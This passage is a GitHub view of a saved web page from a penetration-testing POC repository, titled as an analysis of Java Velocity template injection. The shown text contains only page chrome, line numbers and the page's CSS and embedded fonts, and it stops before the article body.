forked from Mr-xn/Penetration_Testing_POC
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathJAVA安全之Velocity模板注入刨析.html
1002 lines (879 loc) · 395 KB
/
JAVA安全之Velocity模板注入刨析.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<!DOCTYPE html> <html lang=en style><!--
Page saved with SingleFile
url: https://xz.aliyun.com/t/15358
--><meta charset=utf-8>
<title>JAVA安全之Velocity模板注入刨析</title>
<meta name=description content=先知社区,先知安全技术社区>
<meta name=viewport content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no">
<style>/*!
* Bootstrap v2.3.1
*
* Copyright 2012 Twitter, Inc
* Licensed under the Apache License v2.0
* http://www.apache.org/licenses/LICENSE-2.0
*
* Designed and built with all the love in the world @twitter by @mdo and @fat.
*/.clearfix:before,.clearfix:after{display:table;line-height:0;content:""}.clearfix:after{clear:both}footer{display:block}html{font-size:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}a:focus{outline:thin dotted #333;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}a:hover,a:active{outline:0}img{height:auto;vertical-align:middle;-ms-interpolation-mode:bicubic}input{margin:0}button{-webkit-appearance:button}@media print{*{color:#000!important;text-shadow:none!important;background:transparent!important;box-shadow:none!important}a,a:visited{text-decoration:underline}a[href]:after{content:" ("attr(href)")"}.ir a:after,a[href^="javascript:"]:after,a[href^="#"]:after{content:""}pre{border:1px solid #999;page-break-inside:avoid}img{page-break-inside:avoid}img{max-width:100%!important}@page{margin:.5cm}p,h3{orphans:3;widows:3}h3{page-break-after:avoid}}body{margin:0;font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;line-height:20px;color:#333}a{text-decoration:none}a:hover,a:focus{color:#005580;text-decoration:underline}.row:before,.row:after{display:table;line-height:0;content:""}.row:after{clear:both}.container{width:940px}.span10{width:780px}.container{margin-right:auto;margin-left:auto}.container:before,.container:after{display:table;line-height:0;content:""}.container:after{clear:both}p{margin:0 0 10px}strong{font-weight:bold}.text-right{text-align:right}.text-center{text-align:center}h3,h4,h5{margin:10px 0;font-family:inherit;font-weight:bold;line-height:20px;color:inherit;text-rendering:optimizelegibility}h4{font-size:17.5px}ul{padding:0}hr{margin:20px 0;border:0;border-top:1px solid #eee;border-bottom:1px solid #fff}pre{color:#333;-webkit-border-radius:3px;-moz-border-radius:3px}pre{display:block;margin:0 0 10px;white-space:pre-wrap;border:1px solid rgba(0,0,0,0.15);-webkit-border-radius:4px;-moz-border-radius:4px}input{font-weight:normal}input{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif}input[type="text"]{display:inline-block;padding:4px 6px;margin-bottom:10px;font-size:14px;line-height:20px;vertical-align:middle;-webkit-border-radius:4px;-moz-border-radius:4px}input{width:206px}input[type="text"]{background-color:#fff;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);-moz-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);-webkit-transition:border linear .2s,box-shadow linear .2s;-moz-transition:border linear .2s,box-shadow linear .2s;-o-transition:border linear .2s,box-shadow linear .2s;transition:border linear .2s,box-shadow linear .2s}textarea:focus,input[type="text"]:focus,input[type="password"]:focus,input[type="datetime"]:focus,input[type="datetime-local"]:focus,input[type="date"]:focus,input[type="month"]:focus,input[type="time"]:focus,input[type="week"]:focus,input[type="number"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type="search"]:focus,input[type="tel"]:focus,input[type="color"]:focus,.uneditable-input:focus{border-color:rgba(82,168,236,0.8);outline:0;outline:thin dotted \9;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(82,168,236,0.6);-moz-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(82,168,236,0.6);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(82,168,236,0.6)}input::-webkit-input-placeholder,textarea::-webkit-input-placeholder{color:#999}input{margin-left:0}input:focus:invalid,textarea:focus:invalid,select:focus:invalid{color:#b94a48;border-color:#ee5f5b}input:focus:invalid:focus,textarea:focus:invalid:focus,select:focus:invalid:focus{border-color:#e9322d;-webkit-box-shadow:0 0 6px #f8b9b7;-moz-box-shadow:0 0 6px #f8b9b7;box-shadow:0 0 6px #f8b9b7}.fade{opacity:0;-webkit-transition:opacity .15s linear;-moz-transition:opacity .15s linear;-o-transition:opacity .15s linear}.collapse{position:relative;-webkit-transition:height .35s ease;-moz-transition:height .35s ease;-o-transition:height .35s ease;transition:height .35s ease}.btn{text-shadow:0 1px 1px rgba(255,255,255,0.75);vertical-align:middle;background-image:-moz-linear-gradient(top,#fff,#e6e6e6);background-image:-webkit-gradient(linear,0 0,0 100%,from(#fff),to(#e6e6e6));background-image:-webkit-linear-gradient(top,#fff,#e6e6e6);background-image:-o-linear-gradient(top,#fff,#e6e6e6);background-repeat:repeat-x;border:1px solid #ccc;border-bottom-color:#b3b3b3;-webkit-border-radius:4px;-moz-border-radius:4px;-webkit-box-shadow:inset 0 1px 0 rgba(255,255,255,0.2),0 1px 2px rgba(0,0,0,0.05);-moz-box-shadow:inset 0 1px 0 rgba(255,255,255,0.2),0 1px 2px rgba(0,0,0,0.05);box-shadow:inset 0 1px 0 rgba(255,255,255,0.2),0 1px 2px rgba(0,0,0,0.05)}.btn:hover,.btn:focus,.btn:active,.btn.active,.btn.disabled,.btn[disabled]{color:#333;background-color:#e6e6e6;*background-color:#d9d9d9}.btn:active,.btn.active{background-color:#ccc \9}.btn:first-child{*margin-left:0}.btn:hover,.btn:focus{color:#333;text-decoration:none;background-position:0-15px;-webkit-transition:background-position .1s linear;-moz-transition:background-position .1s linear;-o-transition:background-position .1s linear;transition:background-position .1s linear}.btn:focus{outline:thin dotted #333;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}.btn.active,.btn:active{background-image:none;outline:0;-webkit-box-shadow:inset 0 2px 4px rgba(0,0,0,0.15),0 1px 2px rgba(0,0,0,0.05);-moz-box-shadow:inset 0 2px 4px rgba(0,0,0,0.15),0 1px 2px rgba(0,0,0,0.05);box-shadow:inset 0 2px 4px rgba(0,0,0,0.15),0 1px 2px rgba(0,0,0,0.05)}.btn-primary{text-shadow:0-1px 0 rgba(0,0,0,0.25);background-image:-moz-linear-gradient(top,#08c,#04c);background-image:-webkit-gradient(linear,0 0,0 100%,from(#08c),to(#04c));background-image:-webkit-linear-gradient(top,#08c,#04c);background-image:-o-linear-gradient(top,#08c,#04c);background-repeat:repeat-x}.btn-primary:hover,.btn-primary:focus,.btn-primary:active,.btn-primary.active,.btn-primary.disabled,.btn-primary[disabled]{color:#fff;background-color:#04c;*background-color:#003bb3}.btn-primary:active,.btn-primary.active{background-color:#039 \9}.navbar{margin-bottom:20px;overflow:visible}.navbar-inner{background-color:#fafafa;background-image:-moz-linear-gradient(top,#fff,#f2f2f2);background-image:-webkit-gradient(linear,0 0,0 100%,from(#fff),to(#f2f2f2));background-image:-webkit-linear-gradient(top,#fff,#f2f2f2);background-image:-o-linear-gradient(top,#fff,#f2f2f2);background-image:linear-gradient(to bottom,#fff,#f2f2f2);background-repeat:repeat-x;border:1px solid #d4d4d4;-webkit-border-radius:4px;-moz-border-radius:4px;-webkit-box-shadow:0 1px 4px rgba(0,0,0,0.065);-moz-box-shadow:0 1px 4px rgba(0,0,0,0.065)}.navbar-inner:before,.navbar-inner:after{display:table;line-height:0;content:""}.navbar-inner:after{clear:both}.navbar .container{width:auto}.nav-collapse.collapse{height:auto;overflow:visible}.navbar .brand{float:left;font-size:20px;font-weight:200;color:#777;text-shadow:0 1px 0#fff}.navbar .brand:hover,.navbar .brand:focus{text-decoration:none}.breadcrumb{margin:0 0 20px;list-style:none;-webkit-border-radius:4px;-moz-border-radius:4px}.modal{position:fixed;left:50%;z-index:1050;width:560px;margin-left:-280px;background-color:#fff;border:1px solid rgba(0,0,0,0.3);-webkit-border-radius:6px;-moz-border-radius:6px;border-radius:6px;outline:0;-webkit-box-shadow:0 3px 7px rgba(0,0,0,0.3);-moz-box-shadow:0 3px 7px rgba(0,0,0,0.3);box-shadow:0 3px 7px rgba(0,0,0,0.3);-webkit-background-clip:padding-box;-moz-background-clip:padding-box;background-clip:padding-box}.modal.fade{top:-25%;-webkit-transition:opacity .3s linear,top .3s ease-out;-moz-transition:opacity .3s linear,top .3s ease-out;-o-transition:opacity .3s linear,top .3s ease-out;transition:opacity .3s linear,top .3s ease-out}.modal-header{padding:9px 15px;border-bottom:1px solid #eee}.modal-body{position:relative;max-height:400px;padding:15px;overflow-y:auto}.modal-footer{padding:14px 15px 15px;margin-bottom:0;text-align:right;background-color:#f5f5f5;border-top:1px solid #ddd;-webkit-border-radius:0 0 6px 6px;-moz-border-radius:0 0 6px 6px;border-radius:0 0 6px 6px;-webkit-box-shadow:inset 0 1px 0#fff;-moz-box-shadow:inset 0 1px 0#fff;box-shadow:inset 0 1px 0#fff}.modal-footer:before,.modal-footer:after{display:table;line-height:0;content:""}.modal-footer:after{clear:both}.modal-footer .btn+.btn{margin-bottom:0;margin-left:5px}.label{white-space:nowrap;vertical-align:baseline}.label{-webkit-border-radius:3px;-moz-border-radius:3px}.label:empty,.badge:empty{display:none}@-webkit-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@-moz-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@-ms-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@-o-keyframes progress-bar-stripes{from{background-position:0 0}to{background-position:40px 0}}@keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}</style>
<style>/*! Editor.md v1.5.0 | editormd.min.css | Open source online markdown editor. | MIT License | By: Pandao | https://github.com/pandao/editor.md | 2015-06-09 *//*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 */@media only screen and (-webkit-min-device-pixel-ratio:2),only screen and (min-device-pixel-ratio:2){}@media only screen and (-webkit-min-device-pixel-ratio:3),only screen and (min-device-pixel-ratio:3){}/*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 *//*!
* Font Awesome 4.3.0 by @davegandy - http://fontawesome.io - @fontawesome
* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
*/@font-face{font-family:FontAwesome;src:/* original URL: https://xz.aliyun.com/static/editor.md/fonts/fontawesome-webfont.woff2?v=4.3.0 */url(data:font/woff2;base64,)format("woff2");font-weight:400;font-style:normal}@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}/*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 */@font-face{font-family:editormd-logo;src:/* original URL: https://xz.aliyun.com/static/editor.md/fonts/editormd-logo.woff?-5y8q6h */url(data:font/woff;base64,d09GRgABAAAAAATQAAsAAAAABIQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABPUy8yAAABCAAAAGAAAABgDxINKWNtYXAAAAFoAAAAiAAAAIgAXTTPZ2FzcAAAAfAAAAAIAAAACAAAABBnbHlmAAAB+AAAANQAAADUyLObKGhlYWQAAALMAAAANgAAADYFE0uxaGhlYQAAAwQAAAAkAAAAJAesA8ZobXR4AAADKAAAABQAAAAUBfkAD2xvY2EAAAM8AAAADAAAAAwAKAB+bWF4cAAAA0gAAAAgAAAAIAALACluYW1lAAADaAAAAUUAAAFFVxmm7nBvc3QAAASwAAAAIAAAACAAAwAAAAMEAAGQAAUAAAKZAswAAACPApkCzAAAAesAMwEJAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAQAAA//8DwP/AAEADwABAAAAAAQAAAAAAAAAAAAAAIAAAAAAABAAAAAMAAAAkAAAABAAAAFQAAwABAAAAJAADAAoAAABUAAQAMAAAAAgACAACAAAAAQAg//3//wAAAAAAIP/9//8AAf/jAAMAAQAAAAAAAAAAAAwAAAAAADQAAAAAAAAAAwAAAAAAAAABAAAAAQAAACAAAAAgAAAAAwAOGYcADhmHAAAABAABAAH//wAPAAEAAAAAAAAAAAACAAA3OQEAAAAAAQAAAAAAAAAAAAIAADc5AQAAAAABAAAAAAAAAAAAAgAANzkBAAAAAAUADwAMA+oC8gADAA4AHAAhACYAACUHJxcTNz4BHwEeAQ8BJwMTJyMLASMDMxMBMxMXEycbASMnFxMnAwLXXBVxlQ0FFgs9CwgFDHKcdAeC6vWGR1IwAQgr/Q8qBnUikYxx93L2RDhrMwKBHQsIBRsFFgscMv7jAQVF/fYCCv0aAjL9zgIylv5kPAEH/r19MgIqMv3WAAAAAQAAAAAAALngcqpfDzz1AAsEAAAAAADRBgPhAAAAANEGA+EAAAAAA+oC8gAAAAgAAgAAAAAAAAABAAADwP/AAAAEAAAAAAAD6gABAAAAAAAAAAAAAAAAAAAABQAAAAAAAAAAAAAAAAIAAAAD+QAPAAAAAAAKABQAHgBqAAEAAAAFACcABQAAAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAOAK4AAQAAAAAAAQAOAAAAAQAAAAAAAgAOAEcAAQAAAAAAAwAOACQAAQAAAAAABAAOAFUAAQAAAAAABQAWAA4AAQAAAAAABgAHADIAAQAAAAAACgA0AGMAAwABBAkAAQAOAAAAAwABBAkAAgAOAEcAAwABBAkAAwAOACQAAwABBAkABAAOAFUAAwABBAkABQAWAA4AAwABBAkABgAOADkAAwABBAkACgA0AGMAaQBjAG8AbQBvAG8AbgBWAGUAcgBzAGkAbwBuACAAMQAuADAAaQBjAG8AbQBvAG8Abmljb21vb24AaQBjAG8AbQBvAG8AbgBSAGUAZwB1AGwAYQByAGkAYwBvAG0AbwBvAG4ARgBvAG4AdAAgAGcAZQBuAGUAcgBhAHQAZQBkACAAYgB5ACAASQBjAG8ATQBvAG8AbgAuAAAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=)format("woff");font-weight:400;font-style:normal}/*! github-markdown-css | The MIT License (MIT) | Copyright (c) Sindre Sorhus <[email protected]> (sindresorhus.com) | https://github.com/sindresorhus/github-markdown-css */@font-face{font-family:octicons-anchor;src:url(data:font/woff;charset=utf-8;base64,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)format("woff")}.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;overflow:hidden}.markdown-body *{-moz-box-sizing:border-box}.markdown-body a:active,.markdown-body a:hover{outline:0;text-decoration:underline}.markdown-body>:first-child{margin-top:0!important}.markdown-body>:last-child{margin-bottom:0!important}.markdown-body img{-moz-box-sizing:border-box}/*! Pretty printing styles. Used with prettify.js. */@media screen{}@media print,projection{}@media only print{}@media screen{}</style>
<style>/*!
* Bootstrap Responsive v2.3.1
*
* Copyright 2012 Twitter, Inc
* Licensed under the Apache License v2.0
* http://www.apache.org/licenses/LICENSE-2.0
*
* Designed and built with all the love in the world @twitter by @mdo and @fat.
*/.clearfix:before,.clearfix:after{display:table;line-height:0;content:""}.clearfix:after{clear:both}@-ms-viewport{width:device-width}@media (min-width:768px) and (max-width:979px){}@media (max-width:767px){}@media print{}@media (min-width:1200px){.row{margin-left:-30px}.row:before,.row:after{display:table;line-height:0;content:""}.row:after{clear:both}[class*="span"]{float:left;min-height:1px;margin-left:30px}.container{width:1170px}.span10{width:970px}input{margin-left:0}}@media (min-width:768px) and (max-width:979px){.row{margin-left:-20px}.row:before,.row:after{display:table;line-height:0;content:""}.row:after{clear:both}[class*="span"]{float:left;min-height:1px;margin-left:20px}.container{width:724px}.span10{width:600px}input{margin-left:0}}@media (max-width:767px){body{padding-right:0px;padding-left:0px}.container{width:auto}.row{margin-left:0}[class*="span"]{display:block;float:none;width:100%;margin-left:0;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}.modal{position:fixed;right:20px;left:20px;width:auto;margin:0}.modal.fade{top:-100px}}@media (max-width:480px){.nav-collapse{-webkit-transform:translate3d(0,0,0)}.modal{top:10px;right:10px;left:10px}}@media (max-width:979px){body{padding-top:0}.navbar .container{width:auto;padding:0}.navbar .brand{padding-right:10px;padding-left:10px}.nav-collapse{clear:both}.nav-collapse.collapse{height:0;overflow:hidden}}@media (min-width:980px){.nav-collapse.collapse{height:auto!important;overflow:visible!important}}</style>
<style>li{line-height:26px}a:hover{text-decoration:none}.post-user-action>span{margin-right:10px;line-height:21px;border:none}.post-user-action .i-seprator{color:rgba(0,0,0,0.1);margin:0 2px}.navbar .brand{padding:0;height:50px;margin-left:0;display:inline-block!important;background-repeat:no-repeat;width:120px;background-size:207px 50px;background-image:/* original URL: https://xz.aliyun.com/static/icon/xianzhi-brand.svg */url()}.brand-box{position:absolute}.related-section{min-height:42px;padding:5px 0;margin-top:25px;border-top:1px solid #eee}.related-section>.related-box{margin-top:17px}.related-section>.related-box>span{display:inline-block;padding:3px}.related-section>.related-box>span:nth-child(1){width:47%}.related-section>.related-box>span:nth-child(2){border-left:1px solid #eee;padding-left:8px;float:right;width:46%}.related-box .related-label{padding:3px 4px;margin-right:3px}@media screen{.navbar{margin-bottom:12px;overflow:visible}}@media screen and (min-width:1950px){}@media screen and (min-width:1660px) and (max-width:1945px){}@media screen and (min-width:1350px) and (max-width:1659px){}@media screen and (min-width:1100px) and (max-width:1349px){}@media only screen and (max-width:1100px){}@media only screen and (min-width:768px){}@media only screen and (max-width:736px){.brand{margin:0 auto}.brand-box{left:15px}}@media screen and (min-width:768px) and (max-width:1219px){}@media only screen and (min-width:320px) and (max-width:374px){}@media only screen and (min-width:321px) and (max-width:413px){.brand-box{left:15px}}@media screen and (min-width:1220px){}</style>
<style>a{color:#778087}.topic-list p{margin:0 0 0 0}.topic-content{min-height:40px}.collapse form{position:relative;width:300px;float:right}div.search{padding:10px 0}.d1 input{height:20px;padding-left:18px;border:1px solid #ddd;border-radius:15px;outline:none;background:#ffffff;color:#9E9C9C;float:right}.vote{font-weight:normal;margin-left:6px}.topic-list{word-break:break-all;word-wrap:break-word}ul{margin:0 0 10px 0}/*!*border-bottom: solid #eee 1px;*!*/.user-info{padding:5px 0 5px 0}.topic-info a,.topic-info{padding-top:5px}.topic-info a:hover{text-decoration:solid}.reminder{min-height:200px;border:1px #ddd solid;border-radius:3px;line-height:200px;text-align:center}</style>
<style>body{background-color:#eee}form{margin:0!important}a:focus{text-decoration:none}.box ul,ol{margin-bottom:0px!important}.markdown-body ul{list-style-type:disc}.markdown-body ul{margin:0 0 24px 0!important}.box a:hover{text-decoration:none}.box-container>ul>li{list-style-type:none}#Wrapper .row.box{margin-left:0px}.navbar-inner{border-radius:0px;min-height:40px;padding-right:0px;padding-left:0px;outline:none;margin-bottom:0;list-style:none;z-index:1050;background:#fff;-webkit-box-shadow:0 1px 4px rgba(0,21,41,0.08);box-shadow:0 1px 4px rgba(0,21,41,0.08);line-height:46px;-webkit-transition:background .3s,width .2s;-o-transition:background .3s,width .2s;transition:background .3s,width .2s}.bs-docs-footer{text-align:left;color:#99979c;height:64px;background-color:#FFF;border-top:1px solid rgba(0,0,0,0.22);line-height:64px}.bs-docs-footer .links>a{display:inline-block;padding:0 12px;border-left:1px solid #e8e8e8;color:#8c8c8c;line-height:1}.bs-docs-footer .links>a:first-child{border-left:none}.box-container .user-info{margin-bottom:10px;background:#fff}.content-title{font-size:24px;color:#333;text-decoration:none;line-height:24px;text-shadow:0 1px 0#fff}.box-container{padding:20px}.breadcrumb{padding:8px 10px 8px 15px;margin-bottom:10px;border-radius:0;color:#000;background-color:#fff}.breadcrumb>li{text-shadow:none!important;margin:2px 0px}.active{text-shadow:none!important}.breadcrumb .active{color:#555;display:inline-block;text-shadow:none!important}.label{background-color:#f4f4f4;line-height:12px;display:inline-block;padding:4px 4px 4px 4px;-moz-border-radius:2px;-webkit-border-radius:2px;border-radius:2px;text-decoration:none;text-shadow:none;font-weight:normal}.topic-info{color:#999!important;font-size:12px!important}.topic-info a{padding:0px;color:#555!important;font-size:12px!important}.topic-info a:hover{color:#4d5256;text-decoration:underline}.topic-info .cell{padding-left:0!important;margin-left:0px;font-size:10px;font-weight:bold}.markdown-body img{max-width:90%!important;text-align:center;margin-left:auto;margin-right:auto;display:block;padding:10px 0px 10px 0px}.topic-info span{margin-left:0px;font-size:10px;color:rgba(0,0,0,0.45)}.btn{display:inline-block;padding:4px 12px;margin-bottom:0;font-size:14px;line-height:20px;background-color:#f4f4f4;color:#444;border-color:#ddd;font-family:"Helvetica Neue For Number",-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"PingFang SC","Hiragino Sans GB","Microsoft YaHei","Helvetica Neue",Helvetica,Arial,sans-serif;-webkit-box-sizing:border-box;box-sizing:border-box;margin:0;list-style:none;font-weight:400;text-align:center;cursor:pointer;background-image:none;white-space:nowrap;border-radius:2px;height:32px;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none}.box{font-family:Monospaced Number,Chinese Quote,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,PingFang SC,Hiragino Sans GB,Microsoft YaHei,Helvetica Neue,Helvetica,Arial,sans-serif;font-size:14px;line-height:1.5;color:rgba(0,0,0,0.65);-webkit-box-sizing:border-box;box-sizing:border-box;margin-top:0!important;margin-bottom:20px;padding:0;list-style:none;background:#fff;border-radius:2px;position:relative;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s;-moz-box-shadow:0 1px 1px rgba(0,0,0,0.15);-webkit-box-shadow:0 1px 1px rgba(143,168,191,.35);box-shadow:0 1px 1px rgba(143,168,191,.35);border-bottom:1px solid #e2e2e9}.span10{float:left;min-height:1px}#Wrapper .span10{margin-left:0px!important;max-width:960px}@media 